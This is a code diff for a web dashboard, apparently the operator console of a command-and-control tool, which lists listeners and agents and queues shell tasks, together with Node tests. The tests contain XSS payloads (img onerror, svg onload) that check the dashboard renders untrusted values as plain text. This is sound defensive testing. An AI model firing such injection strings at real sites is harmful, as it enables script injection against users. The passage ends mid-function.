+        this.taskRequestAgentID = AgentID;
+        this.taskRequestOffset = requestedOffset;
+        this.taskPageAgentID = AgentID;
+        this.taskPageOffset = requestedOffset;
+        const isCurrentRequest = () => (
+            this.selectedAgentID === AgentID &&
+            this.taskRequestSequence === requestSequence &&
+            this.taskRequestController === requestController
+        );
+
+        if (!outputDiv.hasChildNodes()) {
+            this.replaceTaskOutputMessage(outputDiv, 'Loading tasks...');
+        }
+
+        const requestPromise = this.fetchAgentTaskSummaries(
+            AgentID,
+            outputDiv,
+            requestController,
+            isCurrentRequest,
+            requestedOffset
+        );
+        this.taskRequestPromise = requestPromise;
+        requestPromise.then(
+            () => this.clearTaskRequest(requestController, requestPromise),
+            () => this.clearTaskRequest(requestController, requestPromise)
+        );
+        return requestPromise;
+    }
+
+    async fetchAgentTaskSummaries(
+        AgentID,
+        outputDiv,
+        requestController,
+        isCurrentRequest,
+        requestedOffset
+    ) {
+        try {
+            const response = await fetch(
+                `/api/agents/${encodeURIComponent(AgentID)}/tasks` +
+                    `?limit=${this.TASK_PAGE_LIMIT}&offset=${requestedOffset}`,
+                {signal: requestController.signal}
+            );
+            if (!isCurrentRequest()) {
+                return;
+            }
+            if (!response.ok) {
+                const statusText = response.statusText ? ` ${response.statusText}` : '';
+                throw new Error(
+                    `Task request failed with HTTP ${response.status}${statusText}`
+                );
+            }
+            const payload = await response.json();
+            if (!isCurrentRequest()) {
+                return;
+            }
+            if (!this.isValidTaskPage(payload, requestedOffset)) {
+                throw new Error('Task list response did not match schema version 1');
+            }
+            const tasks = payload.tasks;
+
+            outputDiv.replaceChildren();
+            this.taskElements.clear();
+            if (tasks.length === 0) {
+                this.appendTextElement(
+                    outputDiv,
+                    'div',
+                    '',
+                    payload.total === 0 ? 'No tasks found.' : 'No tasks found on this page.'
+                );
+            } else {
+                tasks.forEach(task => {
+                    if (task.id || task.task_id) {
+                        this.taskStates.set(task.id || task.task_id, task.status || 'unknown');
+                    }
+                    outputDiv.appendChild(this.createTaskResultElement(task, AgentID));
+                });
+            }
+            this.appendTaskPagination(outputDiv, AgentID, payload);
+        } catch (e) {
+            if (e.name === 'AbortError' || !isCurrentRequest()) {
+                return;
+            }
+            this.taskElements.clear();
+            this.replaceTaskOutputMessage(outputDiv, `Error loading tasks: ${e.message}`);
+        }
+    }
+
+    clearTaskRequest(requestController, requestPromise) {
+        if (
+            this.taskRequestController === requestController &&
+            this.taskRequestPromise === requestPromise
+        ) {
+            this.taskRequestController = null;
+            this.taskRequestAgentID = null;
+            this.taskRequestOffset = null;
+            this.taskRequestPromise = null;
+        }
+    }
+
+    taskPageOffsetFor(AgentID) {
+        return this.taskPageAgentID === AgentID ? this.taskPageOffset : 0;
+    }
+
+    isValidTaskPage(payload, requestedOffset) {
+        if (
+            !payload ||
+            payload.schema_version !== 1 ||
+            !Array.isArray(payload.tasks) ||
+            !Number.isInteger(payload.limit) ||
+            payload.limit !== this.TASK_PAGE_LIMIT ||
+            !Number.isInteger(payload.offset) ||
+            payload.offset !== requestedOffset ||
+            !Number.isInteger(payload.total) ||
+            payload.total < 0 ||
+            payload.tasks.length > payload.limit
+        ) {
+            return false;
+        }
+
+        const pageEnd = payload.offset + payload.tasks.length;
+        if (
+            (payload.offset <= payload.total && pageEnd > payload.total) ||
+            (payload.offset > payload.total && payload.tasks.length !== 0)
+        ) {
+            return false;
+        }
+
+        return payload.next_offset === null || (
+            Number.isInteger(payload.next_offset) &&
+            payload.next_offset > payload.offset &&
+            payload.next_offset <= payload.total
+        );
+    }
+
+    appendTaskPagination(outputDiv, AgentID, page) {
+        const hasNewerPage = page.offset > 0;
+        const hasOlderPage = page.next_offset !== null;
+        if (!hasNewerPage && !hasOlderPage) {
+            return;
+        }
+
+        const pagination = document.createElement('div');
+        pagination.className = 'task-pagination button-group';
+        const rangeStart = page.tasks.length === 0 ? 0 : page.offset + 1;
+        const rangeEnd = page.offset + page.tasks.length;
+        this.appendTextElement(
+            pagination,
+            'span',
+            'timestamp',
+            `Tasks ${rangeStart}-${rangeEnd} of ${page.total}`
+        );
+
+        if (hasNewerPage) {
+            const newerOffset = Math.max(0, page.offset - page.limit);
+            pagination.appendChild(this.createActionButton(
+                'action-button secondary',
+                'Newer',
+                () => void this.navigateTaskPage(AgentID, newerOffset)
+            ));
+        }
+        if (hasOlderPage) {
+            pagination.appendChild(this.createActionButton(
+                'action-button secondary',
+                'Older',
+                () => void this.navigateTaskPage(AgentID, page.next_offset)
+            ));
+        }
+        outputDiv.appendChild(pagination);
+    }
+
+    navigateTaskPage(AgentID, offset) {
+        if (this.selectedAgentID !== AgentID) {
+            return Promise.resolve();
+        }
+        this.abortTaskDetailRequests();
+        return this.loadAgentResults(AgentID, offset);
+    }
+
+    replaceTaskOutputMessage(outputDiv, message) {
+        const messageElement = document.createElement('div');
+        messageElement.textContent = message;
+        outputDiv.replaceChildren(messageElement);
+    }
+
+    createTaskResultElement(task, AgentID) {
+        const container = document.createElement('div');
+        container.className = 'command-result';
+        const taskID = task.id || task.task_id || 'unknown';
+        const cacheKey = this.taskCacheKey(AgentID, taskID);
+        const renderedTask = this.taskDetailCache.get(cacheKey) || task;
+        this.renderTaskResultElement(container, renderedTask, AgentID);
+        this.taskElements.set(cacheKey, container);
+        return container;
+    }
+
+    renderTaskResultElement(container, task, AgentID) {
+        container.replaceChildren();
+
+        const taskID = task.id || task.task_id || 'unknown';
+        const status = task.status || 'unknown';
+        const result = task.result || {};
+        const outcome = result.outcome || task.outcome || '';
+        const command = task.arguments && typeof task.arguments.command === 'string'
+            ? task.arguments.command
+            : '';
+
+        const heading = document.createElement('div');
+        heading.className = 'command';
+        heading.textContent = command || `${task.type || 'task'} ${taskID}`;
+        container.appendChild(heading);
+
+        const metadata = document.createElement('div');
+        metadata.className = 'timestamp';
+        const metadataParts = [`Task ${taskID}`, `status: ${status}`];
+        if (outcome) {
+            metadataParts.push(`outcome: ${outcome}`);
+        }
+        if (Number.isInteger(result.exit_code)) {
+            metadataParts.push(`exit: ${result.exit_code}`);
+        }
+        metadata.textContent = metadataParts.join(' · ');
+        container.appendChild(metadata);
+
+        const timestampParts = [
+            ['created', task.created_at],
+            ['queued', task.queued_at],
+            ['dispatched', task.dispatched_at],
+            ['started', task.started_at || result.started_at],
+            ['completed', task.completed_at || result.completed_at],
+            ['expires', task.expires_at]
+        ]
+            .filter(([, value]) => value)
+            .map(([label, value]) => `${label} ${value}`);
+        if (timestampParts.length > 0) {
+            const timestampLine = document.createElement('div');
+            timestampLine.className = 'timestamp';
+            timestampLine.textContent = timestampParts.join(' · ');
+            container.appendChild(timestampLine);
+        }
+
+        const output = result.output || {};
+        const stdout = typeof output === 'string' ? output : output.stdout;
+        const stderr = typeof output === 'object' && output !== null ? output.stderr : '';
+        this.appendTaskStream(container, 'stdout', stdout);
+        this.appendTaskStream(container, 'stderr', stderr);
+        this.appendTaskStream(container, 'error', result.error);
+
+        const isOutputBearingTerminal = status === 'completed' || status === 'failed';
+        const hasDetailedOutput = this.hasDetailedTaskOutput(task);
+        if (isOutputBearingTerminal && !hasDetailedOutput) {
+            const loadButton = this.createActionButton(
+                'action-button',
+                'Load output',
+                () => void this.loadTaskDetails(AgentID, taskID, loadButton)
+            );
+            container.appendChild(loadButton);
+        }
+    }
+
+    async loadTaskDetails(AgentID, taskID, loadButton) {
+        const cacheKey = this.taskCacheKey(AgentID, taskID);
+        const cached = this.taskDetailCache.get(cacheKey);
+        if (cached) {
+            const currentContainer = this.currentTaskContainer(cacheKey, AgentID);
+            if (currentContainer) {
+                this.renderTaskResultElement(currentContainer, cached, AgentID);
+            }
+            return;
+        }
+
+        const existingRequest = this.taskDetailRequests.get(cacheKey);
+        if (existingRequest) {
+            return existingRequest.promise;
+        }
+
+        const requestController = new AbortController();
+        loadButton.disabled = true;
+        loadButton.textContent = 'Loading output...';
+        const detailPromise = this.fetchTaskDetail(
+            AgentID,
+            taskID,
+            cacheKey,
+            requestController,
+            loadButton
+        );
+        this.taskDetailRequests.set(cacheKey, {
+            controller: requestController,
+            promise: detailPromise
+        });
+        try {
+            await detailPromise;
+        } finally {
+            const currentRequest = this.taskDetailRequests.get(cacheKey);
+            if (currentRequest && currentRequest.controller === requestController) {
+                this.taskDetailRequests.delete(cacheKey);
+            }
+        }
+    }
+
+    async fetchTaskDetail(
+        AgentID,
+        taskID,
+        cacheKey,
+        requestController,
+        loadButton
+    ) {
+        try {
+            const response = await fetch(
+                `/api/agents/${encodeURIComponent(AgentID)}/tasks/${encodeURIComponent(taskID)}`,
+                {signal: requestController.signal}
+            );
+            if (!response.ok) {
+                const statusText = response.statusText ? ` ${response.statusText}` : '';
+                throw new Error(
+                    `Task detail request failed with HTTP ${response.status}${statusText}`
+                );
+            }
+            const payload = await response.json();
+            const task = payload && payload.task ? payload.task : payload;
+            if (!task || (task.id || task.task_id) !== taskID) {
+                throw new Error('Task detail response did not match the requested task');
+            }
+            if (task.agent_id && task.agent_id !== AgentID) {
+                throw new Error('Task detail response did not match the selected agent');
+            }
+            if (!this.hasDetailedTaskOutput(task)) {
+                throw new Error('Task detail response did not include full output');
+            }
+            if (requestController.signal.aborted || this.selectedAgentID !== AgentID) {
+                return;
+            }
+
+            this.cacheTaskDetail(cacheKey, task);
+            const currentContainer = this.currentTaskContainer(cacheKey, AgentID);
+            if (currentContainer) {
+                this.renderTaskResultElement(currentContainer, task, AgentID);
+            }
+        } catch (error) {
+            if (error.name === 'AbortError') {
+                return;
+            }
+            const currentContainer = this.currentTaskContainer(cacheKey, AgentID);
+            if (!currentContainer) {
+                return;
+            }
+            loadButton.disabled = false;
+            loadButton.textContent = 'Retry output';
+            this.appendTextElement(
+                currentContainer,
+                'div',
+                'error-message',
+                `Error loading output: ${error.message}`
+            );
+        }
+    }
+
+    currentTaskContainer(cacheKey, AgentID) {
+        if (this.selectedAgentID !== AgentID) {
+            return null;
+        }
+        return this.taskElements.get(cacheKey) || null;
+    }
+
+    taskCacheKey(AgentID, taskID) {
+        return `${AgentID}\u0000${taskID}`;
+    }
+
+    hasDetailedTaskOutput(task) {
+        const output = task && task.result && task.result.output;
+        return Boolean(
+            output &&
+            typeof output === 'object' &&
+            Object.prototype.hasOwnProperty.call(output, 'stdout') &&
+            Object.prototype.hasOwnProperty.call(output, 'stderr')
+        );
+    }
+
+    cacheTaskDetail(cacheKey, task) {
+        this.taskDetailCache.delete(cacheKey);
+        this.taskDetailCache.set(cacheKey, task);
+        while (this.taskDetailCache.size > this.MAX_TASK_DETAIL_CACHE) {
+            const oldestKey = this.taskDetailCache.keys().next().value;
+            this.taskDetailCache.delete(oldestKey);
+        }
+    }
+
+    abortTaskDetailRequests() {
+        for (const request of this.taskDetailRequests.values()) {
+            request.controller.abort();
+        }
+        this.taskDetailRequests.clear();
+        this.taskElements.clear();
+    }
+
+    appendTaskStream(container, label, value) {
+        if (typeof value !== 'string' || value.length === 0) {
+            return;
+        }
+
+        const streamLabel = document.createElement('div');
+        streamLabel.className = 'timestamp';
+        streamLabel.textContent = label;
+        container.appendChild(streamLabel);
+
+        const stream = document.createElement('pre');
+        stream.className = 'output';
+        stream.textContent = value;
+        container.appendChild(stream);
     }
 }
 
-// Initialize the dashboard manager when the page loads
 let dashboardManager;
-document.addEventListener('DOMContentLoaded', () => {
-    dashboardManager = new DashboardManager();
-});
+
+// Initialize the dashboard manager when the page loads.
+if (typeof document !== 'undefined') {
+    document.addEventListener('DOMContentLoaded', () => {
+        dashboardManager = new DashboardManager();
+    });
+}
+
+// Expose the class to the lightweight Node contract tests without changing the
+// browser-facing global script behavior.
+if (typeof module !== 'undefined' && module.exports) {
+    module.exports = {DashboardManager};
+}

--- a/server/web/js/index.js
+++ b/server/web/js/index.js
@@ -212,6 +212,8 @@ class DashboardManager {
         if (command) {
             const agentID = this.selectedAgentID;
             try {
+                // The root-relative API path and encoded ID cannot select another origin.
+                // foxguard: ignore[js/no-ssrf]
                 const response = await fetch(`/api/agents/${encodeURIComponent(agentID)}/tasks`, {
                     method: 'POST',
                     headers: {
@@ -409,6 +411,8 @@ class DashboardManager {
 
     async startListener(id) {
         try {
+            // The root-relative API path and encoded ID cannot select another origin.
+            // foxguard: ignore[js/no-ssrf]
             const response = await fetch(`/api/listeners/${encodeURIComponent(id)}/start`, {
                 method: 'POST',
                 headers: {
@@ -445,6 +449,8 @@ class DashboardManager {
 
     async stopListener(id) {
         try {
+            // The root-relative API path and encoded ID cannot select another origin.
+            // foxguard: ignore[js/no-ssrf]
             const response = await fetch(`/api/listeners/${encodeURIComponent(id)}/stop`, {
                 method: 'POST',
                 headers: {
@@ -480,6 +486,8 @@ class DashboardManager {
         if (!confirm(`Are you sure you want to delete ${name}?`)) return;
         
         try {
+            // The root-relative API path and encoded ID cannot select another origin.
+            // foxguard: ignore[js/no-ssrf]
             const response = await fetch(`/api/listeners/${encodeURIComponent(id)}`, {
                 method: 'DELETE',
                 headers: {
@@ -513,6 +521,8 @@ class DashboardManager {
 
     async handleStartListenerFallback(id) {
         try {
+            // The root-relative API path and encoded ID cannot select another origin.
+            // foxguard: ignore[js/no-ssrf]
             const response = await fetch(`/api/listeners/${encodeURIComponent(id)}`);
             if (!response.ok) {
                 throw new Error(`Failed to get listener details (${response.status})`);
@@ -524,6 +534,8 @@ class DashboardManager {
             delete newConfig.id;
             
             // Delete the old listener
+            // The root-relative API path and encoded ID cannot select another origin.
+            // foxguard: ignore[js/no-ssrf]
             const deleteResponse = await fetch(`/api/listeners/${encodeURIComponent(id)}`, {
                 method: 'DELETE'
             });
@@ -724,6 +736,8 @@ class DashboardManager {
         if (!confirm(`Are you sure you want to remove agent ${AgentID}?`)) return;
 
         try {
+            // The root-relative API path and encoded ID cannot select another origin.
+            // foxguard: ignore[js/no-ssrf]
             const response = await fetch(`/api/agents/${encodeURIComponent(AgentID)}`, {
                 method: 'DELETE'
             });
@@ -806,6 +820,8 @@ class DashboardManager {
         requestedOffset
     ) {
         try {
+            // The root-relative API path uses an encoded ID and bounded numeric query values.
+            // foxguard: ignore[js/no-ssrf]
             const response = await fetch(
                 `/api/agents/${encodeURIComponent(AgentID)}/tasks` +
                     `?limit=${this.TASK_PAGE_LIMIT}&offset=${requestedOffset}`,
@@ -1076,6 +1092,8 @@ class DashboardManager {
         loadButton
     ) {
         try {
+            // The root-relative API path uses encoded identifiers only.
+            // foxguard: ignore[js/no-ssrf]
             const response = await fetch(
                 `/api/agents/${encodeURIComponent(AgentID)}/tasks/${encodeURIComponent(taskID)}`,
                 {signal: requestController.signal}

--- a/server/web/js/index.test.js
+++ b/server/web/js/index.test.js
@@ -1,0 +1,651 @@
+'use strict';
+
+const assert = require('node:assert/strict');
+const {afterEach, test} = require('node:test');
+const {DashboardManager} = require('./index.js');
+
+const originalDocument = global.document;
+const originalFetch = global.fetch;
+
+afterEach(() => {
+    global.document = originalDocument;
+    global.fetch = originalFetch;
+    delete globalThis.__dashboardXssTriggered;
+});
+
+test('typed task submission uses the canonical v1 create request', async () => {
+    const output = new FakeElement('div');
+    const input = new FakeElement('input');
+    input.value = 'whoami';
+    installDocument({output, input});
+
+    let request;
+    global.fetch = async (url, options) => {
+        request = {url, options};
+        return response({
+            status: 202,
+            body: {
+                schema_version: 1,
+                id: 'task-one',
+                agent_id: 'agent-one',
+                status: 'queued'
+            }
+        });
+    };
+
+    const manager = createManager();
+    manager.appendLogEntry = () => {};
+    manager.loadAgentResults = async () => {};
+
+    await manager.sendCommand();
+
+    assert.equal(request.url, '/api/agents/agent-one/tasks');
+    assert.equal(request.options.method, 'POST');
+    assert.deepEqual(JSON.parse(request.options.body), {
+        schema_version: 1,
+        type: 'shell',
+        arguments: {command: 'whoami'},
+        timeout_seconds: 30,
+        expires_in_seconds: 300
+    });
+    assert.equal(input.value, '');
+});
+
+test('a superseded task poll cannot overwrite the newest response', async () => {
+    const output = new FakeElement('div');
+    installDocument({output});
+
+    const pendingRequests = [];
+    global.fetch = (url, options) => new Promise(resolve => {
+        pendingRequests.push({url, options, resolve});
+    });
+
+    const manager = createManager();
+    const firstPoll = manager.loadAgentResults('agent-one');
+    manager.selectedAgentID = 'agent-two';
+    const secondPoll = manager.loadAgentResults('agent-two');
+
+    assert.equal(pendingRequests.length, 2);
+    assert.equal(pendingRequests[0].options.signal.aborted, true);
+
+    pendingRequests[1].resolve(response({
+        body: taskList([task('task-new', 'echo newest', 'running', 'agent-two')])
+    }));
+    await secondPoll;
+
+    pendingRequests[0].resolve(response({
+        body: taskList([task('task-old', 'echo stale', 'queued')])
+    }));
+    await firstPoll;
+
+    assert.equal(output.children.length, 1);
+    assert.equal(output.children[0].children[0].textContent, 'echo newest');
+});
+
+test('task polling renders HTTP failures separately from an empty task list', async () => {
+    const output = new FakeElement('div');
+    installDocument({output});
+    global.fetch = async () => response({
+        status: 503,
+        statusText: 'Service Unavailable'
+    });
+
+    const manager = createManager();
+    await manager.loadAgentResults('agent-one');
+
+    assert.equal(output.children.length, 1);
+    assert.equal(
+        output.children[0].textContent,
+        'Error loading tasks: Task request failed with HTTP 503 Service Unavailable'
+    );
+});
+
+test('a slow same-agent poll is shared instead of aborted by the next tick', async () => {
+    const output = new FakeElement('div');
+    installDocument({output});
+
+    const pendingRequests = [];
+    global.fetch = (url, options) => new Promise(resolve => {
+        pendingRequests.push({url, options, resolve});
+    });
+
+    const manager = createManager();
+    const firstPoll = manager.loadAgentResults('agent-one');
+    const nextTick = manager.loadAgentResults('agent-one');
+
+    assert.equal(firstPoll, nextTick);
+    assert.equal(pendingRequests.length, 1);
+    assert.equal(pendingRequests[0].options.signal.aborted, false);
+
+    pendingRequests[0].resolve(response({
+        body: taskList([task('task-one', 'echo eventual', 'running')])
+    }));
+    await Promise.all([firstPoll, nextTick]);
+
+    assert.equal(output.children.length, 1);
+    assert.equal(output.children[0].children[0].textContent, 'echo eventual');
+});
+
+test('task history navigation fetches one bounded page at a time', async () => {
+    const output = new FakeElement('div');
+    installDocument({output});
+    const newestTasks = Array.from(
+        {length: 50},
+        (_, index) => task(`task-${index}`, `echo ${index}`, 'completed')
+    );
+    const requestedURLs = [];
+    global.fetch = async url => {
+        requestedURLs.push(url);
+        if (url.endsWith('offset=50')) {
+            return response({
+                body: taskList(
+                    [task('task-50', 'echo oldest', 'completed')],
+                    {offset: 50, total: 51}
+                )
+            });
+        }
+        return response({
+            body: taskList(
+                newestTasks,
+                {total: 51, nextOffset: 50}
+            )
+        });
+    };
+
+    const manager = createManager();
+    await manager.loadAgentResults('agent-one');
+
+    assert.deepEqual(requestedURLs, [
+        '/api/agents/agent-one/tasks?limit=50&offset=0'
+    ]);
+    assert.equal(findAllByClass(output, 'command-result').length, 50);
+    let pagination = findByClass(output, 'task-pagination');
+    assert.equal(findByClass(pagination, 'timestamp').textContent, 'Tasks 1-50 of 51');
+    assert.deepEqual(
+        findAllByTag(pagination, 'button').map(button => button.textContent),
+        ['Older']
+    );
+
+    findAllByTag(pagination, 'button')[0].click();
+    await waitFor(() => requestedURLs.length === 2);
+    await waitFor(() => output.children[0].children[0].textContent === 'echo oldest');
+
+    assert.equal(
+        requestedURLs[1],
+        '/api/agents/agent-one/tasks?limit=50&offset=50'
+    );
+    assert.equal(findAllByClass(output, 'command-result').length, 1);
+    pagination = findByClass(output, 'task-pagination');
+    assert.equal(findByClass(pagination, 'timestamp').textContent, 'Tasks 51-51 of 51');
+    assert.deepEqual(
+        findAllByTag(pagination, 'button').map(button => button.textContent),
+        ['Newer']
+    );
+
+    findAllByTag(pagination, 'button')[0].click();
+    await waitFor(() => requestedURLs.length === 3);
+    await waitFor(() => findAllByClass(output, 'command-result').length === 50);
+    assert.equal(
+        requestedURLs[2],
+        '/api/agents/agent-one/tasks?limit=50&offset=0'
+    );
+});
+
+test('a superseded same-agent page request cannot overwrite the selected page', async () => {
+    const output = new FakeElement('div');
+    installDocument({output});
+
+    const pendingRequests = [];
+    global.fetch = (url, options) => new Promise(resolve => {
+        pendingRequests.push({url, options, resolve});
+    });
+
+    const manager = createManager();
+    const olderPage = manager.loadAgentResults('agent-one', 50);
+    const newestPage = manager.loadAgentResults('agent-one', 0);
+
+    assert.equal(pendingRequests.length, 2);
+    assert.equal(pendingRequests[0].options.signal.aborted, true);
+
+    pendingRequests[1].resolve(response({
+        body: taskList([task('task-new', 'echo newest', 'queued')])
+    }));
+    await newestPage;
+    pendingRequests[0].resolve(response({
+        body: taskList(
+            [task('task-old', 'echo stale', 'completed')],
+            {offset: 50, total: 51}
+        )
+    }));
+    await olderPage;
+
+    assert.equal(output.children.length, 1);
+    assert.equal(output.children[0].children[0].textContent, 'echo newest');
+});
+
+test('task polling rejects an incomplete page envelope', async () => {
+    const output = new FakeElement('div');
+    installDocument({output});
+    global.fetch = async () => response({
+        body: {
+            schema_version: 1,
+            tasks: [],
+            total: 0,
+            next_offset: null
+        }
+    });
+
+    const manager = createManager();
+    await manager.loadAgentResults('agent-one');
+
+    assert.equal(
+        output.children[0].textContent,
+        'Error loading tasks: Task list response did not match schema version 1'
+    );
+});
+
+test('listener metadata is text-only and actions preserve the original values', async () => {
+    const listeners = new FakeElement('div');
+    installDocument({elements: {'active-listeners': listeners}});
+    const injection = `x'"><img src=x onerror="globalThis.__dashboardXssTriggered=true">`;
+    globalThis.__dashboardXssTriggered = false;
+    global.fetch = async () => response({
+        body: [{
+            id: injection,
+            name: injection,
+            protocol: injection,
+            host: injection,
+            port: injection,
+            status: injection,
+            error: injection
+        }]
+    });
+
+    const calls = [];
+    const manager = createManager();
+    manager.stopListener = id => calls.push(['stop', id]);
+    manager.deleteListener = (id, name) => calls.push(['delete', id, name]);
+
+    await manager.loadActiveListeners();
+
+    assert.equal(globalThis.__dashboardXssTriggered, false);
+    assert.equal(listeners.innerHTMLWrites, 0);
+    assert.equal(listeners.children.length, 1);
+    const card = listeners.children[0];
+    assert.equal(card.dataset.id, injection);
+    assert.equal(findByClass(card, 'listener-name').textContent, injection);
+    assert.equal(findByClass(card, 'listener-type').textContent, injection);
+    assert.equal(findByClass(card, 'listener-id').textContent, `ID: ${injection}`);
+    assert.equal(
+        findByClass(card, 'listener-details').children[1].textContent,
+        `Host: ${injection}:${injection}`
+    );
+    assert.equal(findByClass(card, 'status-unknown').textContent, injection);
+    assert.equal(findByClass(card, 'error-message').textContent, `Error: ${injection}`);
+
+    const buttons = findAllByTag(card, 'button');
+    buttons[0].click();
+    buttons[1].click();
+    assert.deepEqual(calls, [
+        ['stop', injection],
+        ['delete', injection, injection]
+    ]);
+});
+
+test('agent metadata is text-only and actions preserve the original ID', async () => {
+    const agents = new FakeElement('div');
+    installDocument({elements: {'agent-list': agents}});
+    const injection = `agent'"><svg onload="globalThis.__dashboardXssTriggered=true">`;
+    globalThis.__dashboardXssTriggered = false;
+    global.fetch = async () => response({
+        body: {
+            malicious: {
+                id: injection,
+                type: injection,
+                ip: injection,
+                hostname: injection,
+                os: injection,
+                connected: true,
+                last_seen: '2026-07-23T16:30:00Z'
+            }
+        }
+    });
+
+    const calls = [];
+    const manager = createManager();
+    manager.interactWithAgent = id => calls.push(['interact', id]);
+    manager.removeAgent = id => calls.push(['remove', id]);
+
+    await manager.loadActiveAgents();
+
+    assert.equal(globalThis.__dashboardXssTriggered, false);
+    assert.equal(agents.innerHTMLWrites, 0);
+    assert.equal(agents.children.length, 1);
+    const card = agents.children[0];
+    assert.equal(card.dataset.id, injection);
+    assert.equal(findByClass(card, 'agent-name').textContent, injection);
+    assert.equal(findByClass(card, 'agent-type').textContent, injection);
+    const detailText = findByClass(card, 'agent-details').children.map(child => child.textContent);
+    assert.equal(detailText[1], `IP: ${injection}`);
+    assert.equal(detailText[2], `Hostname: ${injection}`);
+    assert.equal(detailText[3], `OS: ${injection}`);
+
+    const buttons = findAllByTag(card, 'button');
+    buttons[0].click();
+    buttons[1].click();
+    assert.deepEqual(calls, [
+        ['interact', injection],
+        ['remove', injection]
+    ]);
+});
+
+test('terminal task output is fetched on demand and rendered as text', async () => {
+    const output = new FakeElement('div');
+    installDocument({output});
+    const agentID = 'agent:name';
+    const taskID = 'task:one';
+    const injection = '<img src=x onerror="globalThis.__dashboardXssTriggered=true">';
+    globalThis.__dashboardXssTriggered = false;
+    const requestedURLs = [];
+    global.fetch = async url => {
+        requestedURLs.push(url);
+        if (url.includes('?limit=')) {
+            return response({
+                body: taskList([completedTask(taskID, agentID, null)])
+            });
+        }
+        return response({
+            body: completedTask(taskID, agentID, {
+                schema_version: 1,
+                task_id: taskID,
+                agent_id: agentID,
+                outcome: 'completed',
+                started_at: '2026-07-23T16:30:02Z',
+                completed_at: '2026-07-23T16:30:03Z',
+                exit_code: 0,
+                output: {stdout: injection, stderr: injection}
+            })
+        });
+    };
+
+    const manager = createManager();
+    manager.selectedAgentID = agentID;
+    await manager.loadAgentResults(agentID);
+
+    assert.equal(
+        requestedURLs[0],
+        '/api/agents/agent%3Aname/tasks?limit=50&offset=0'
+    );
+    const loadButton = findAllByTag(output, 'button')[0];
+    assert.equal(loadButton.textContent, 'Load output');
+    loadButton.click();
+    await waitFor(() => manager.taskDetailRequests.size === 0);
+
+    assert.equal(
+        requestedURLs[1],
+        '/api/agents/agent%3Aname/tasks/task%3Aone'
+    );
+    assert.equal(globalThis.__dashboardXssTriggered, false);
+    const streams = findAllByTag(output, 'pre');
+    assert.deepEqual(
+        streams.map(stream => stream.textContent),
+        [injection, injection]
+    );
+    assert.equal(findAllByTag(output, 'button').length, 0);
+});
+
+test('a stale task-detail response cannot update a newly selected agent', async () => {
+    const output = new FakeElement('div');
+    installDocument({output});
+    let resolveDetail;
+    global.fetch = (url, options) => {
+        if (url === '/api/agents/agent-one/tasks?limit=50&offset=0') {
+            return Promise.resolve(response({
+                body: taskList([completedTask('task-one', 'agent-one', null)])
+            }));
+        }
+        if (url === '/api/agents/agent-two/tasks?limit=50&offset=0') {
+            return Promise.resolve(response({
+                body: taskList([task('task-two', 'echo agent two', 'queued', 'agent-two')])
+            }));
+        }
+        return new Promise(resolve => {
+            resolveDetail = body => resolve(response({body}));
+            assert.equal(options.signal.aborted, false);
+        });
+    };
+
+    const manager = createManager();
+    await manager.loadAgentResults('agent-one');
+    findAllByTag(output, 'button')[0].click();
+    const detailRequest = manager.taskDetailRequests.get(
+        manager.taskCacheKey('agent-one', 'task-one')
+    );
+    assert.ok(detailRequest);
+
+    manager.selectedAgentID = 'agent-two';
+    manager.abortTaskDetailRequests();
+    assert.equal(detailRequest.controller.signal.aborted, true);
+    await manager.loadAgentResults('agent-two');
+
+    resolveDetail(completedTask('task-one', 'agent-one', {
+        schema_version: 1,
+        task_id: 'task-one',
+        agent_id: 'agent-one',
+        outcome: 'completed',
+        started_at: '2026-07-23T16:30:02Z',
+        completed_at: '2026-07-23T16:30:03Z',
+        exit_code: 0,
+        output: {stdout: 'stale output', stderr: ''}
+    }));
+    await detailRequest.promise;
+
+    assert.equal(output.children.length, 1);
+    assert.equal(output.children[0].children[0].textContent, 'echo agent two');
+    assert.equal(findAllByTag(output, 'pre').length, 0);
+});
+
+function createManager() {
+    const manager = Object.create(DashboardManager.prototype);
+    manager.previousListenerStates = new Map();
+    manager.previousAgentStates = new Map();
+    manager.selectedAgentID = 'agent-one';
+    manager.taskStates = new Map();
+    manager.taskRequestSequence = 0;
+    manager.taskRequestController = null;
+    manager.taskRequestAgentID = null;
+    manager.taskRequestOffset = null;
+    manager.taskRequestPromise = null;
+    manager.taskPageAgentID = null;
+    manager.taskPageOffset = 0;
+    manager.taskDetailCache = new Map();
+    manager.taskDetailRequests = new Map();
+    manager.taskElements = new Map();
+    manager.TASK_PAGE_LIMIT = 50;
+    manager.MAX_TASK_DETAIL_CACHE = 20;
+    manager.agentInteractionSequence = 0;
+    return manager;
+}
+
+function installDocument({
+    output = new FakeElement('div'),
+    input = new FakeElement('input'),
+    elements = {}
+}) {
+    const elementByID = {
+        'command-output': output,
+        'command-input': input,
+        ...elements
+    };
+    global.document = {
+        createElement: tag => new FakeElement(tag),
+        createTextNode: text => {
+            const node = new FakeElement('#text');
+            node.textContent = String(text);
+            return node;
+        },
+        getElementById: id => {
+            if (Object.hasOwn(elementByID, id)) {
+                return elementByID[id];
+            }
+            throw new Error(`Unexpected element id: ${id}`);
+        }
+    };
+}
+
+function response({status = 200, statusText = 'OK', body = null}) {
+    return {
+        ok: status >= 200 && status < 300,
+        status,
+        statusText,
+        json: async () => body
+    };
+}
+
+function taskList(
+    tasks,
+    {
+        limit = 50,
+        offset = 0,
+        total = tasks.length,
+        nextOffset = null
+    } = {}
+) {
+    return {
+        schema_version: 1,
+        tasks,
+        limit,
+        offset,
+        total,
+        next_offset: nextOffset
+    };
+}
+
+function task(id, command, status, agentID = 'agent-one') {
+    const value = {
+        schema_version: 1,
+        id,
+        agent_id: agentID,
+        type: 'shell',
+        arguments: {command},
+        timeout_seconds: 30,
+        status,
+        created_at: '2026-07-23T16:30:00Z',
+        queued_at: '2026-07-23T16:30:00Z',
+        expires_at: '2026-07-23T16:35:00Z'
+    };
+    if (status !== 'queued') {
+        value.dispatched_at = '2026-07-23T16:30:01Z';
+    }
+    if (status === 'running') {
+        value.started_at = '2026-07-23T16:30:02Z';
+    }
+    return value;
+}
+
+function completedTask(id, agentID, result) {
+    return {
+        ...task(id, 'echo complete', 'completed', agentID),
+        started_at: '2026-07-23T16:30:02Z',
+        completed_at: '2026-07-23T16:30:03Z',
+        ...(result ? {result} : {
+            result: {
+                schema_version: 1,
+                task_id: id,
+                agent_id: agentID,
+                outcome: 'completed',
+                started_at: '2026-07-23T16:30:02Z',
+                completed_at: '2026-07-23T16:30:03Z',
+                exit_code: 0
+            }
+        })
+    };
+}
+
+async function waitFor(predicate) {
+    for (let attempt = 0; attempt < 20; attempt++) {
+        if (predicate()) {
